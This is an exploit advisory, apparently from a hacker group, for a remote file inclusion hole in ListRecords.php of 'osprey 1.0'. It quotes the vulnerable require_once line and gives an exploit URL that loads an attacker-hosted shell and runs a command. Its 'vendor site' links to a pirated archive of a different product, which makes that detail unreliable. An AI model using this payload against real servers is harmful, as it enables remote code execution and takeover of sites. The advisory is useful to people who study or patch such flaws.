osprey 1.0 suffers from a remote file inclusion vulnerability in ListRecords.php.
124a4e21c6f7bb1049b3c29f5be5410ce28143fd856071a7e080776fe8b5a715
#==============================================================================================
# osprey 1.0 (ListRecords.php) Remote File Include Vulnerability
#===============================================================================================
#
#Critical Level : Dangerous
#
#Venedor site : http://warez.gtasoft.ru/skripts/p4CMS.v1.05.Nullified-WTN.rar
#
#
#================================================================================================
#Bug in : ListRecords.php
#
#Vlu Code :
#--------------------------------
#
#
require_once($lib_dir .'Document.class.php');
#
#
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/ListRecords.php?lib_dir=http://SHELLURL.COM?&cmd=id
#
#================================================================================================
#Discoverd By : KaBaRa.HaCk.eGy
#
#Conatact : KaBaRa.HaCk.eGy[at]hotmail.com
#
#GreetZ : eGypT.GHosT - ToOoFa - LeCoPrA - MaHmooD_ali - MoHandKo - The_Sniper - Broken-broxy - abdoullaH00
# AND My BroTherS Turkish HaCkeRs--> HaCkerfreeze & My Turkish TeaM--> BelGium SeCurity FoR My BrO ..MeRtXx..
# Special Thx To : TryaG.CoM & AsbMay.NeT
==================================================================================================